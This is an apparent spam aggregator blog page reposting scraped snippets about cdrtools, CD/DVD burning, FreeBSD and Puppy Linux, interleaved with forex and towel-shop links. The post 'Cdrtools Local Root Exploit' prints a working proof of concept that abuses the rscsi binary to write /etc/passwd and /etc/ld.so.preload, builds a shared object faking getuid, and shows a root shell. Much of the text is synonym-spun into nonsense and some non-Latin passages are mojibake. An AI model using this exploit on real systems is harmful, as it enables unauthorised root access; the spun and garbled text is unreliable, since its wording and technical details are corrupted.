cdrtools

search for more blogs here

 

"Bittorrent" posted by ~Ray
Posted on 2008-01-02 00:19:28

ファイル共有ソフト Bittorrent ! そのうち私も京都府警に捕まるかもねっ ! だが Slackware のディスクを落とすにはこれしか方法がないんだよ ...なんか本家の Bittorrent をインストールするにはその他大量の補助ソフトが必要なんですが、Slackware 公式サイトで配布されてる Bittorrent はものすげーシンプルでした。しかも軽い ... 100kB 程度。こんなので動くわけがねーよっ、その他大量のライブラリも Bittorrent と同じ場所で配布しろよ ! けっ ! ぺっ ! ... と思ってたらこれだけで動きました。テキストベースだけんど。じゃあ、じゃあ、本家で配布してる Bittorrent が必要とするのは 9 割 9 分以上 GUI の部品かい !! もーちっとどーにかならんものですかね。とにもかくにも Bittorrent がコマンドラインで動くようになり、これではれて Slackware 12.0 のディスクが 3 枚落とせました。Bittorrent は WinMX (古) と同じく落としながら上げたりするんですが、ちょっと違うのは「同時に複数の場所から落とせる」ということらしいです。Winny がどうなってるのかは ... 年寄りにはわかんね。まーとゆーわけで、「ダウンロード希望者が多ければ多いほどダウンロードが速くなる」なんて不思議な現象が起きたりするみたいです。Slackware を世に広めるために私もアップロードに協力せねばなるまいわなァ ! と思ったんですが、何故か思うようにアップできず。それでも 150MB くらいは貢献したかな ... ひょっとして ADSL は時代遅れだからひっこんでろということでしょうかっ ? ... あるいは Slackware のダウンロード希望者がいねーとか ... ?たとえ れっどはっとが あっとうてきシェアをほこるとも ...... すらっくうぇあは ...... ふめつ ...ついでに当然 CD-R に iso を焼くことになったのですが、xcdroast が動かねえ ... どうもカーネル 2.6 はサポートされへんとか。確か cdrtools は scsi エミュレーションでないと動かないとか言ってた気がしますが、2.6 にはそれがないってこと ? ... いやそうでもないみたい。イロイロ調べてみると、scsi エミュレーションに関してリーナスと cdrtools 製作者で戦争が起こったらしい。リーナスは scsi エミュレーションなんてダセーぜ、時代遅れだぜ ! と言うのに対して cdrtools 製作者は私ぁ scsi コマンドが好きなんだよォ ! と反発したらしい ... 微妙に違うかもしれないけど、多分こんな感じ。それで結局どうなったかというと、リーナスが cdrtools の 2.6 用パッチを作成し、ユーザーはとりあえず普通に cdrtools を使えるようになったとか。まー多分この手の紛争に決着はつかねーと思いますが、とりあえずユーザーにまで火の粉は及んでこなかったということですか ? 私の xcdroast は ... バージョンが古いのか何か知りませんが。ともかく防備録としては、dev=ATAPI を付ければオッケー ? 少なくともデバイスチェックはcdrecord -scanbus dev=ATAPI焼くのはcdrecord [options] dev=ATAPI:x,x,x hoge isoみたいなー。ちなみに scsi エミュレーション使ってたときは確かにいちいちカーネルオプションつきで再起動したりして最低だったような記憶もあります。そーゆー意味においては私もリーナスを支持しますかね。.

Forex Groups - Tips on Trading

Related article:
http://syamato.blog111.fc2.com/blog-entry-71.html

comments | Add comment | Report as Spam


"FreeBSD 7 and the FreeBSD installer" posted by ~Ray
Posted on 2007-12-15 15:48:55

Note: This article is half-finished but I wanted to get my compose out there. I’ll end up the rest in the next 48-72 hours. After reading about the FreeBSD Graphical Installer I was immediately tempted by the inclusion of the recently ported ZFS. I quickly decided I would give the experimental case a go around and decided I would enter and chronicle my adventures so others could try it out as well. Initially I assumed the new graphical installer was included in the “FreeBSD-Current” nightly build — so I browsed the FreeBSD snapshot site: and downloaded the most recent build for my architecture which ended up being “7.0-CURRENT-200710-i386-disc1 iso”. This assumption turned out to be incorrect the FreeBSD Graphical Installer (finstall) has not yet been merged in to the main CVS repository and much to my discourage it is in the “experimental” perforce repository. I’ve already written on why I think FreeBSD is making a bad choice using a proprietary version hold back package in the bind: “” My initial suspicion was confirmed since there is no anonymous find to the perforce repository I was forced to transfer the “finistall” communicate file by register through the web interface. I can understand the be to have a separate “unstable” repository but there is no good reason I can think of that it should be managed by perforce thus excluding the weekend tinkerer desire me. There are three directories in the perforce repository: 1) “/” which contains the PyGTK graphical component this is what end users ordain interact with directly. 2) “/” this contains the supporting label for the graphical component this what actually performs the configurations selected by the user via the graphical user interface and finally 3) “/” which contains the python scripts used to generate live cd iso’s with the finstall enabled. This measure directory is what we are looking for specifically the “” script. The script requires an existing system to aid into the be CD — I used the FreeBSD Current ISO listed above in the first section. The install went smoothly as usual which is a promising sign for the pending 7.0 channel. Initially I only downloaded revision 12 of the makeimage py script and a copy of maptree py — however I realized I needed the whole channelise and since it is in the qusi-exlusive perforce channelise I was forced to download the files one by one through the web interface. See tarball of “” in the resources section for the same files I’ve used in this document. A quick glance through makeimage py tells me I’ll need to install python (since it is a python script) and cdrtools to create the visualise. I’ll also need to run the script at root at certain points so be prepared and double check you undergo grow find on your forge. I first used portsnap to update my ports tree with the following two commands for my freshly installed system: Now that we undergo all the packages we need on our system we can run the makeimage script that ordain actually generate the FreeBSD finstall LiveCD. /makeimage py -d /usr/local/finstall -i FREEBSD7-FINSTALL iso -f -p pkglist After makeimage py finishes the console is a little “wacky” (yes that is a technical term). Just type exit and re-login and you should be fine. Unfortunately the finstall livecd I built my self doesn’t exactly bring home the bacon (yet…) . It boots but moused choose of half freezes at one inform during the kick — though hitting enter seems to refresh the check and I’m able to login as the “install” user the paths to the startxfce go away script are different on my livecd and the one Ivan produced thus causing it to fail. If I correct this manually and then run startx the desktops are not configured the same. Basically mine doesn’t bring home the bacon. But I’m willing to accept it is something I have done incorrectly during my tweaking and ordain re-visit this in a bring together of days. […] I wrote for the Free Software Magazine and a collide with approve for a blog entry I wrote about the upcoming FreeBSD installer “finstall” . Here is a screen shot of the results summon for my vanity examine above (Click on image for full […] XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Forex Groups - Tips on Trading

Related article:
http://yousefourabi.com/bsd/freebsd-7-and-the-freebsd-installer

comments | Add comment | Report as Spam


"Cdrtools Local Root Exploit" posted by ~Ray
Posted on 2007-12-09 14:22:36

Vulnerable Systems: * cdrtools version 2 x and belowImmune Systems: * cdrtools version 2.01a18A vulnerability in cdrtools allows local attackers to overwrite files one align effect of the overwriting affect is that the register's permissions becomes writable by the user calling the rscsi program. This can allow a non-root user to take local root on the machine that has cdrtools installed. Initial attempts to apply this air failed for an unknown cerebrate.. this however this is comfort a valid method of contend. We alter use of the first argument passed to rscsi in order to choose the file we desire to create verbally to. Due to the create from rscsi we make use of 0x08 in request to delete some of the characters that otherwise would be written. This attack method relies on placing a line of text at the end of a register. gratify note that 2 other lines of garbage will be placed in the register that may create other issues. Proff of Concept:elguapo@gentoo elguapo $ echo C`emit -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/hit\x0a"` | /opt/schily/sbin/rscsi /tmp/lalaSegmentation accuse (this segfault is not related to the security air)elguapo@gentoo elguapo $ cat /tmp/lalarscsid: user id 1000 name elguapormt: stdin is a PIPEr00t::0:0:root:/grow:/bin/bashWhen attempting to emit this line to the password register we get the following error (say that the password file is overwritten at this inform):E0Illegal user id for RSCSI server0elguapo@gentoo elguapo $ cat /etc/passwdrscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI serverrscsid:>E 0 (Illegal user id for RSCSI server) []We do however undergo another exploitation option such as the one listed below:[kf@vegeta kf]$ ls -al /etc/ld so preloadls: /etc/ld so preload: No such register or directory[kf@vegeta kf]$ cat > oops cint getuid(void){return(0);}[kf@vegeta kf]$ gcc -c -o oops o oops c[kf@vegeta kf]$ ld -shared -o oops so oops o[kf@vegeta kf]$ ls -al oops so-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops so[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld so preloadE0Garbage dominate0say that we now have write permissions to /etc/ld so preload-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld so preloadSo to gain elevated privileges all we be to do is:[kf@vegeta kf]$ emit /home/kf/oops so > /etc/ld so preload[kf@vegeta kf]$ su[root@vegeta kf]# rm /etc/ld so preloadrm: remove regular file `/etc/ld so preload'? y[grow@vegeta kf]# iduid=0(root) gid=0(grow) groups=0(grow),1(bin),2(daemon),3(sys),4(adm),6(disk),10(go around)Workaround:chmod -s /opt/schily/sbin/rscsi

Forex Groups - Tips on Trading

Related article:
http://pirate-unsecure.blogspot.com/2007/11/cdrtools-local-root-exploit.html

comments | Add comment | Report as Spam


"Pre-Master mit mkisofs & cdrtools" posted by ~Ray
Posted on 2007-11-27 21:49:15

Hey Leute,ich habe vor zwei Jahren eine CD-ROM zur Pressung gegeben. Es gab keineBeschwerden - weder vom Vervielfältiger noch von den Nutzern. Nun stehtein neues Projekt an welches auf CD-ROM und DVD-ROM erscheinen sollen. Letztes Mal habe ich schlicht Nero verwendet dieses Mal möchte ich abermkisofs / cdrtools verwenden da ich nur Positives davon gehört habe. Ich habe mir mal angeguckt wie Pressungen gemastert wurden. Anscheinendgibt es kein richtiges Muster. Manche verwenden ISO 9660 + Joliet + UDFauf einer CD-ROM manche verwenden ISO 9660 + RockRidge. Die CD und DVD soll hauptsächlich auf Windows-Systemen gelesen werdenkönnen da die Anwendung erst ab Win98 funktioniert - leider nicht inWINE. Allerdings wäre es nicht schlecht wenn man von Linux & MacOS 9/Xauf den Dateninhalt zugreifen könnte. Was haltet ihr hiervon?CD-ROM:- File-System: ISO 9660 + Joliet- ISO 9660 Dateiformat: DOS (8.3)- Kleinbuchstaben erlauben- DOS Zeichensatz verwenden- ISO 9660 Datei-Versionsnummer nicht verwerfen- Joliet Dateiformat: Standard (64) - falls notwendig Extended (110)DVD:- File-System: ISO 9660 + Joliet + UDF- ISO 9660 Dateiformat: DOS (8.3)- Kleinbuchstaben erlauben- DOS Zeichensatz verwenden- ISO 9660 Datei-Versionsnummer nicht verwerfen- Joliet Dateiformat: Standard (64) - falls notwendig Extended (110)Ich denke dass ich auf RockRidge verzichten kann da Joliet von Linux,Unix und MacOS gelesen werden kann. Auch werde ich keine ultra-tiefen Verzeichnisverschachtelungen mitDateinamen über 100 Zeichen haben. Allerdings bin ich mir mit dem ISO-Zeichensatz nicht sicher. In denManuals habe ich gelesen dass manchmal auch Windows/Unix (31) verwendetwird. Aber das bezieht sich ja glaube ich eh nur auf die Lesbarkeitunter DOS? Wäre aber trotzdem schöner eine vernünftige Pressungrauszugeben. Viele GrüßeTobias.

Forex Groups - Tips on Trading

Related article:
http://newsgroups.derkeiler.com/Archive/De/de.comp.hardware.laufwerke.brenner/2007-11/msg00061.html

comments | Add comment | Report as Spam


"sysutils/cdrtools-cjk - 2.01.20041227_2" posted by ~Ray
Posted on 2007-11-17 17:38:43

A means that commits will be few and far between and only by approval. CD/CD-R[W] and ISO-9660 image creation and extraction tools Fix PKGORIGIN by backing out part of the previous act. The firstcategory in CATEGORIES should always be physical category. Approved by: portmgr (self) 16 vulnerabilities affecting 29 ports have been reported in the past 14 days

Forex Groups - Tips on Trading

Related article:
http://www.freshports.org/commit.php?category=sysutils&port=cdrtools-cjk&files=yes&message_id=200710310756.l9V7ul4q024918@repoman.freebsd.org

comments | Add comment | Report as Spam


"Burniso2cd bugfix and improved" posted by ~Ray
Posted on 2007-11-09 19:10:11

The compose of 'cdrecord' a utility in the 'cdrtools' package changed the create format when 'cdrecord -scanbus' is executed. Thus scripts in Puppy 2.17 and earlier that have this ordain not work in 2.20. Note the Debian fork of cdrtools also has the same problem. I fixed the Burniso2cd utility (see Multimedia menu) script /usr/sbin/burniso2cd and while I was in the script I decided to furnish it a end overhaul. Improvements to the user interface also can now decide the burn go. While I evaluate of it. Nathan if you construe this. I did a search of the scripts looking for others that kill 'cdrecord -scanbus' and open that the 'copy_cd' script in Grafburn does. I think I remember something about you using the Debian lift so you probably already have the compose working authorise with the different create change. ( 345 views ) | I spent about four hours this morning creating decorations for the next Christmas channelise!I don't have any CD-RWs so I burnt a heap of CD-Rs trying to track drink the bug with the 'pfix=ram' kick parameter. It was elusive but I was pleased when I open the create. There were two bugs in the 'init' compose. One little bug was the create of most of the bug-reports from our Puppy-testers. It was a variable in a loop in the 'init' compose that should have been initialised each measure go the circle. Anyway the repercusions: If you booted the live-CD with 'pfix=ram' and the PC has a full-install of Puppy somewhere on it you will get a kernel panic. If you avoided the kernel panic. Puppy started up in RAM alright object with PDEV1="". That causes great affect as many scripts read PDEV1 from /etc/rc d/PUPSTATE and evaluate it to have the kick divide. For example,the 'zdrvfind' script needs it to locate the 'zdrv_220 sfs' file consequently modules do not load. Another example is the 'rc shutdown' compose. Maybe some effect on frugal lay also. I'll undergo to check that one. say when I was testing 2.20alpha prior to its release. I mostly booted from a Flash drive as that's most convenient way of quickly testing changes. I also tested a h d frugal install having booted off a radiate drive and it worked book. ( 502 views ) | I'm trying to get printing working in 2.20alpha. Firstly when installing a printer the CUPS web interface asks for a username and password. I don't denote Puppy's root password so exit from X write "passwd" and enter a password for example "puppy". go away X run the CUPS web interface and when it asks for username and password register "root" and "puppy".... I don't know how to configure CUPS not to ask for a username/password. back up problem and it seems that this has to be fixed before setting up the printer. 2.20alpha does not undergo 'foomatic-rip' installed so I grabbed it from Puppy 2.17 placed it at /usr/bin/foomatic-rip and created a symlink from /usr/lib/cups/filters/foomatic-rip. Then I setup the printer and clicked "Printer test summon" button but got an error communicate "/usr/lib/cups/filter/foomatic-rip failed". Nowhere can I see any details on why it failed. The foomatic-rip script does undergo an option to turn on debugging but that doesn't bring home the bacon. ( 828 views ) | This is not a command release. It is for our Puppy-testers to test. It will most likely be followed by a beta then a final. The iso register is 93.4MB and you can get it as well as the 'devx' register from here:This alpha is not intended to be perfect nor representative exactly of what ordain be in the final channel. I did undergo a measure constraint as have to upload it today while I have ADSL2 access. From my limited testing though it looks good. There are a few things that I undergo not yet put in such as the improved communicate Wizard that Tempestuous and Dougal have been working on. Also some packages will be updated by the beta especially Abiword and Gnumeric. I have thrown in the Atol 2-pane file manager just for something to compete with though I doubt it will be in the final. Some libraries may comfort be updated. The 'devx' register may not be complete but it worked authorise for a bring together of packages I compiled. Although Xine has its own in-built ffmpeg. I have left in the displace ffmpeg package as various applications be it such as Grafburn. To sight out about what is new and can be tested construe down through this News Blog. One new feature is the improved handling of frugal installs -- use the Universal Installer and you will be offered to install into a folder. Basically whatever area of arouse you have web browsing converse multimedia installation boot media etc. give this pup a go and let me know the outcome. Of course the usual thing. If booting on a PC that already has a 'pup_save' file use the kick parameter 'puppy pfix=ram' to avoid it being loaded. Though if you have more than one 'pup_save' you ordain get a menu and you can decide none of them. We don't really be to fill an old pup_deliver just yet as the upgrade may not be quite alter. say that the kernel is compiled with loglevel=7 meaning that you get lots of cram displaying on the screen while booting. This ordain be changed for the final. I also intend to create 2.20 with the earlier 2.6.18 x kernel as some populate undergo reported the 2.17 pup not working properly and it appears to be a kernel version problem -- I'm not sure about one thing dialup dropout may be a problem with the 2.6.21 x kernel which we will affirm when we analyse the two kernels. ( 870 views ) | authorise. I undergo reduced the live-CD ISO file to 93.2MB about the same as 2.17 and I'm aiming for even displace. Nothing drastic has been done. Gaim/Pidgin is gone replaced with the online chat system which gives find to Yahoo. MSN. IRC etc. Perl is retained or rather the cudown Perl case that has just enough functionality to conform to Ndiswrapper and CUPS. hopefully it works as I had to upgrade it for fiddle compatibility. Although Slackware 12 has Perl version 5.8.8 same as Puppy 2.1x there are some layout differences. I just created a 'perl-5.8.8tiny' with the different directory layout but all the same files taken from Slack. ESP Ghostscript from Slackware 12 has an extra dependency. Gnutls so I had to put that in along with its dependencies libgcrypt and libgpg-error. I wish they had compiled it to use SSL instead.. oh well. I anticipate Gnutls is good to have as there are other packages that use it and can now be plonked straight in. I took out SDL. We have never had this in previous puppies but it would be nice to undergo for the gamers amongst us. It's not all that big.. maybe if I can do some size-hacking elsewhere. I can sneak it back in. I discovered that the 'createpuppy' script in Unleashed has a bug. I had 'xorg_BASIC-7.0' and 'xorg_BASIC-7.2' packages in the 'packages' directory with only the latter "on" in 'packages txt' however createpuppy blended both packages into the live-CD. I had to shift the old one from the 'packages' directory. Right now I don't undergo the time or inclination to go through the compose and sight why it's doing that. So for now. I need to beat up a little compose to put into Unleashed-core that only downloads packages in 'packages txt' not everything from ibiblio..

Forex Groups - Tips on Trading

Related article:
http://www.puppylinux.com/news/index.php?entry=entry070906-220334

comments | Add comment | Report as Spam


"Paper Towels and more website..." posted by ~Ray
Posted on 2007-11-08 15:29:55

Look for paper towels , linens, bath towels, and more at TowelTown.com
stop by anytime

comments | Add comment | Report as Spam


"I need help with this command line using Terminal app" posted by ~Ray
Posted on 2007-11-03 15:03:43

20: You'll be to transfer and hive away cdrtools () to get find to the mkisofs program. (Quick overview on compiling it: Download it remove it dress into the directory you extracted it into type make wait for it to finish then sudo make install).21: write: /opt/schily/bin/mkisofs -relaxed-filenames -d -D -l -N -o WXPCCP_EN iso -b boot img -c kick cat -no-emul-boot WXPCCP_ENOk I dled cdrtools but I dont know what the step is asking me to do. And I tried skipping it and entered the lie in step 21 but it says /opt/schily/bin/mkisofs directoy could not be found. Please back up me ASAP Mac Specs: Macbook Pro 2.16Ghz Core Duo. 2GB ram. 256MB vid. Dual 867Mhz MDD. 1.75GB ram. ATI 9800 Pro video go 20 is asking you to download some source label and compile it. You be to have the developer tools installed to hive away it. If you don't have the developer tools installed you can try my little cozen that I already mentioned somewhere else. procure ©2001-2007 Mac-Forums com. All Rights Reserved. A division of. Other iNET Interactive Sites: | | | | | Powered by vBulletin Version 3.6.2procure &write;2000 - 2007. Jelsoft Enterprises Ltd.

Forex Groups - Tips on Trading

Related article:
http://www.mac-forums.com/forums/showthread.php?t=76239

comments | Add comment | Report as Spam


"Eight months later: Again the future of CD/DVD-recording" posted by ~Ray
Posted on 2007-10-28 12:59:37

First. I have to change by reversal one sentence in my about this topic. It read “non-free version of ” which is not true. The current are licensed under the which is of course an Open Source authorise. But it is not compatible with the GNU GPL according to the enumerate of. But what changed within those more than eight months between the previous and this post? It seems that died in May. There are comfort some random posts on the there was a minor bugfix-release with corrections in the man-page but no real code-change. made a big step forward and now supports unicode out of the box. ISO-files > 4GB (up to 8TB think about DVD-9) and change surface Blu Ray! I ordain try to act current versions of both apps in portage so that the user can decide which one to use. The only thing I'm not sure about is if I should change approve the fail virtual for cdrtools? Currently it's pointing to so that any dependency will use that application. But as soon as a GUI supports Blu Ray I should change it back to Probably that will be around Christmas when the average Nerd finds such a Blu Ray burner under the Christmas channelise Allowed XHTML tags: <p ul ol li dl dt dd address blockquote ins del span bdo br em strong dfn code samp kdb var cite abbr acronym q sub sup tt i b big small> (Allow users to communicate you through a message form (your telecommunicate will NOT be displayed.))

Forex Groups - Tips on Trading

Related article:
http://planet.gentoo.org/developers/pylon/2007/08/24/eight_months_later_again_the_future_of_c

comments | Add comment | Report as Spam


"make release problems with sysutils/mkisofs and sysutils/cdrtools ..." posted by ~Ray
Posted on 2007-10-23 16:42:03

I've been trying to make release a 7.0 mouth on a new current box and yesterday made it to mkisofs that doesn't seem to be in ports any longer so I installed it but didn't ask about it yesterday and today I got to it not finding the dist register for cdrtools. Could there be a make problem in src/release or could I be doing something wrong?Thanks,ed_______________________________________________freebsd-current@xxxxxxxxxxx mailing listTo unsubscribe send any mail to "freebsd-current-unsubscribe@xxxxxxxxxxx" . yesterday made it to mkisofs that doesn't be to be in ports any longer soI installed it but didn't ask about it yesterday and today I got to it not finding the dist file forcdrtools. .. request to run alter channel (otherwise you can't make the ISO). ... I'd analyse the handbook though to make sure. ... (freebsd-current) . filesystem within a register) to a DVD but mkisofs tells me the file is too... I looked on Google and open that mkisofs had a filesize limit of 2 GB. ... Does the developmentversion of cdrtools in ports have the 4 GB limit? ... (freebsd-questions) .. act the iso via mkisofs use burncd or growisofs to burn the dvd. ...> filesystem within a register) to a DVD but mkisofs tells me the file is too.. so Iguess the version in ports still has the 2 GB limits. ... (freebsd-questions) .. >> dress your mouse and keyboard over. ... > I did that once by accident,... > Maybe that's why the ports are colour coded? ... (alt os windows-xp)

Forex Groups - Tips on Trading

Related article:
http://unix.derkeiler.com/Mailing-Lists/FreeBSD/current/2007-08/msg00787.html

comments | Add comment | Report as Spam


"cdrtools 2.01.01a35 (Development branch)" posted by ~Ray
Posted on 2007-10-17 16:08:34

About:cdrtools (formerly cdrecord) creates home-burned CDs/DVDs with a CDR/CDRW/DVD recorder. It works as a burn engine for several applications. It supports CD/DVD recorders from many different vendors; all SCSI-3/mmc- andATAPI/mmc-compliant drives should also bring home the bacon. Supported features include IDE/ATAPI agree port and SCSI drives audio CDs data CDs and mixed CDs beat multi-session support. CDRWs (rewritable). DVD-R/-RW. DVD+R/+RW,TAO. DAO. RAW and human-readable error messages cdrtools includes remote SCSI give and can find local or remote CD/DVD writers. Changes: Cdda2wav now has new option. -start-sector tostart on an absolute sector number as a first stepto allow cdda2wav to be used as a GStreamerplugin. The cdda2wav man page now lists alloptions. Libparanoia dynamic overlap setup nowuses a correct start value. The "large register limit" is 2**31 -2 bytes. Mkisofs already writes larger files since a long measure. Mkisofs supports to write the max size of UDF files (234 GB) since 2002 butlimits the coat to 4 GB - 2kB for consistencywith ISO-9660. If you desire to write files larger than 4 GB - 2kB then you need to act a few weeks. Mkisofs will go away to give files up to8 TB with ISO-9660 soon. say that compatibilityand consistency is better than implementinghacks. Oh be. Jrg is calling linux "broken" again. Raise your hand if you'resurprised. For those of you who don't evaluate one CD burning application is worthaltering the entire linux drive addressing system there is a betteroption. It's called "cdrkit" and it's a fork of cdrecord from before Jrgscrewed the license up. It's being run by some debian devs but I canattest it works on slackware too. The freshmeat entry for cdrkit is here: libburn is no Debian peoject... This kind of incorrect claims is typical for the people behind cdrkit... Cdrtools is a freeproject that depends on nobody who pays for it. All people from Debian who are involved in thedisput and who started it are payed for theirwork at Debian. Besides the fact that the Debianfork you are talking about is dead for a while,tell me who has which commercial interests inthe this act against OSS that has been initiatedby a small be of populate from Debian?I understand that people desire you cannot live with the truth and call itFUD... > ScanMail is detecting a virus in 2.01.> Is this possible?> > &#65279;"ScanMail detected and> removed a virus from the original mail> entity. You can safely save or remove> this replacement attachment."> I ran into this air (not with scanmail though) and went approve anddownloaded from another source didn't have issues the back up time around. I don't believe it's actually a virus just some add-on content thattripped the scanner. Best Regards, I purchased a Lite-On SHW-1635S Dual-layer DVD burner measure month with agift separate I received for Christmas. This burner claims create verbally speeds of 48X CD-R 24X CD-RW 8X DVD-RW 8X DVD+RW 4X DVD+R DL 16X DVD+RYet. I was only able to get 16X CD-R (with 52X capable blank CD-R) 6X DVD+R (with 16X capable keep DVD+R) error attempting to burn DVD+R DL (2.4X capable)I started examining the obtain code to cdrtools (version 2.01) and noticedthat cdrecord has some due to a bug (intentional or not) in Lite-on'sfirmware dating approve to 1998 or so. The changelog mentions something tothis cause. It's a moot point trying to get this fixed since I took the control backand exchanged it for a different brand/model (which works fine). I use Linux compile cdrtools from source and used K3b (also compiledfrom source). Any others' ideas? Thanks > I started examining the obtain label to> cdrtools (version 2.01) and noticed that> cdrecord has some due to a bug> (intentional or not) in Lite-on's> firmware dating approve to 1998 or so. > The changelog mentions something to this> cause. The above should say:I started examining the source code to cdrtools (version 2.01) and noticedthat cdrecord has some FIXES to accommodate a bug (intentional or not) inLite-on's firmware.... Many apologies! Although it can be a bit cumbersome with SuS9.0 include files i like tocompile cdrecord binaries from Joerg's original sources. This isespecially rewarding now since the recent development version 2.01.01a09includes unlimited DVD support and there is no be any more to maintain acdrecord-ProDVD binary with temporary license keys. As for dvd+rw-tools (aka growisofs): i still like this over cdrecord forDVD because it can pipe a data stream of unpredicted length. The main favor of cdrecord with DVD is its unified dominate interfacefor CD and DVD. You might be able to talk some stone-old CD frontend intoburning DVD that way. Thank heaven for cdrecord and mkisofs ! > Never use Jrg Schilling's cdrtools> directly since this guy is being paid by> Sun and that means that other operating> systems like Linux are not taken into> be. You have to use the patched> cdrtools versions from a study Linux> distribution desire RedHat. SUSE or Debian>.

Forex Groups - Tips on Trading

Related article:
http://rss.freshmeat.net/~r/freshmeat/feeds/fm-releases-unix/~3/151597752/

comments | Add comment | Report as Spam


"[comp]FreeBSD 6.2-RELEASE??????CD??????" posted by ~Ray
Posted on 2007-10-10 17:19:35

  まぁ・・・「口が悪い」のは仕様ですw。  音楽・動画やニュースねたとか、そういうのメインで行こうかなーと。  ※逆SEO対策(笑)で、「避/難/所」表記をとることにしました。  違う「避☆難☆所」の検索がきちゃうので・・・。  こんなかんじです。うちは /cdboot/fsconf/ にしました。 #!/bin/sh# errorchkerr() { case $1 in 0) ;; *) echo "$2 failed: dropping into /bin/sh" /bin/sh # bear on ;; esac}mount_md() { /sbin/mdmfs -S -i 4096 -s $1 -M md $2}# act the memory filesystem if it has not already been createdcreate_md() { if [ "x`eval echo \\$md_created_$1`" = "x" ]; then if [ "x`eval echo \\$md_size_$1`" = "x" ]; then md_coat=10240 else md_size=`eval emit \\$md_coat_$1` fi mount_md $md_size /$1 /bin/chmod 755 /$1 eval md_created_$1=created fi}for j in /cdboot/fsconf/* ; do # memory filesystem size specification subdir=${j##*/} if [ -d $j -a -f $j/md_size ]; then eval md_size_$subdir=`cat $j/md_size` emit "md_size for $subdir is $md_coat_$subdir" fidonefor j in /cdboot/fsconf/* ; do subdir=${j##*/} if [ -d $j -a ! -f $j cpio gz ]; then echo "Creating md for $subdir" create_md $subdir emit "Copying to md : $j -> $subdir" cp -Rp $j/* /$subdir fidone /cdboot/fsconf/ に置くファイルについてですが、以下のとおりです。 また、/etc/ に /etc/ cdrom を読み込む処理を追記するのは以下の場所です。 HOME=/PATH=/sbin:/bin:/usr/sbin:/usr/binexport domiciliate PATH# ここからif [ -r /etc/rc cdrom ]; then. /etc/rc cdromfi# ここまで 私の環境では、/etcをMFSしてるので、さらにfstabの記述も必要になります。 mkisofs -A "label" -R -J -b kick/cdboot -no-emul-boot -c boot compile -o 出力するISOイメージのファイル名 /mnt/cdimage

Forex Groups - Tips on Trading

Related article:
http://d.hatena.ne.jp/yu--nyan/20070823/1187862185

comments | Add comment | Report as Spam


"?????? ???? ? ?????..." posted by ~Ray
Posted on 2007-10-03 18:30:46

..于 仗仍舒仆亠 亳舒仆亳 亟亳从仂于 从亳仄亳 亳仄亠仆舒仄亳 舒亶仍仂于. 仄亠亠:- 仗亳舒仍从舒 k3b 于亠亳亳 1.0.3- 仆舒弍仂 亳仍亳 cdrtools 于亠亳亳 2.01.01a34- Slackware Linux 12.0- 磲仂 于亠亳亳 2.6.22.5- 仍仂从舒仍 UTF-8弌仂弍亳舒亠仄 cdrtools. 舒亠仄 仂弍亳舒亠仄 k3b 仍仂从舒仍亳亰舒亳亠亶. 舒仗从舒亠仄 k3b. 亳亟舒亠仄 于 仗仂亠从 舒亶仍. 从仂仂亠 仂亳仄 亰舒仗亳舒. 舒亠仄 亢仄仄 "舒仗亳" ("Burn!"). 仗仂磦亳于亠仄 仂从仂从亠 于弍亳舒亠仄 从仂仂 亰舒仗亳亳. 亠亢亳仄 亰舒仗亳亳 ( 仂舒于仍 Auto). 亟仄 于仂 于从仍舒亟从 "个舒亶仍仂于舒 亳亠仄舒" ("Filesystem"). 舒亰亟亠仍亠 "File System" 于弍亳舒亠仄 "Linux/Unix + Windows". 仄仄 从仆仂仗从 "舒仂亳" ("Custom"). 舒亰亟亠仍亠 "Other settings" 仂仄亠舒亠仄 仗仆从 "compel input charset" 亳 舒于亳仄 于仂 仍仂从舒仍 (于 仄仂仄 仍舒亠 仂 utf-8; 仆亠 亰舒弍于舒亠仄. 仂 仗亳舒 仆舒亟仂 于 仆亳亢仆亠仄 亠亞亳亠). 仗亳从亠 仆舒仂亠从 于仆亳亰 于 舒亰亟亠仍亠 "Joliet settings" 仆亳仄舒亠仄 亞舒仍仂从 亠亟亳仆于亠仆仆仂亞仂 仗仆从舒 "舒亰亠亳 仆舒亰于舒仆亳 舒亶仍仂于 Joliet 亟仂 103 亳仄于仂仍仂于". 丐舒从亢亠 仆舒 于磻亳亶 仍舒亶 仗仂舒于亳仍 亞舒仍仂从 (仆亠 亰仆舒. 仆舒亟仂 亳仍亳 仆亠) 于 舒亰亟亠仍亠 "ISO9660 Settings" 仆舒 仗仆从亠 "仗仂仍亰仂于舒 仗仂仍仆 舒弍仍亳 ASCII-亳仄于仂仍仂于 亟仍 ISO9660".. 丐亠仗亠 仄仂亢仆仂 仗亳舒 亳 舒亟仂于舒.

Forex Groups - Tips on Trading

Related article:
http://yelloweyedwolf.livejournal.com/59285.html

comments | Add comment | Report as Spam


"[??]???mkisofs?????????????" posted by ~Ray
Posted on 2007-09-30 17:17:59

膤紫筝Debian etchcdrtools-2.00.3 tar gz鐚茵ヤcdrtools-2.00.3-CJK patch羈膽莚鐚noboru_nls_conjoin_20030714 txt gz篁ョ莚羌莚篁Adobe. CS3. Production. Premium.11. Disc. BiTN\Premium_circumscribe_DISC8 iso鐚AUTORUN. INF [Deutsch] [English] [Espa単ol] [Fran巽ais][Italiano] cspp ico [ユ茯] 2 筝篁 74,452 絖noboru_nls_conjoin_20030714 txt gz -J -udf -D -input-charset utf8膸win筝罩e幻丞ず鐚linux筝贋・mount"?"mtabーisoudf鐚iso9660鐚綏ヨ-t udf膸筝眼篏筝坂贋・mount -o,circle 篌菴筝阪鐚[筝阪ー篋菴筝鐚篁ユ蘂篋絎臂]筝遺菴喝鐚羣iso莎鐚mkisofs 2.0 -udf -V CS3 Production Premium Content -J -D -o.../CS3PPC_20070612114729WINmulR udf.../CD 1

Forex Groups - Tips on Trading

Related article:
http://www.linuxsir.org/bbs/showthread.php?t=311797&goto=newpost

comments | Add comment | Report as Spam


"cd free hp now record upgrade writer - michael-moore-bush.info" posted by ~Ray
Posted on 2007-09-28 15:17:52

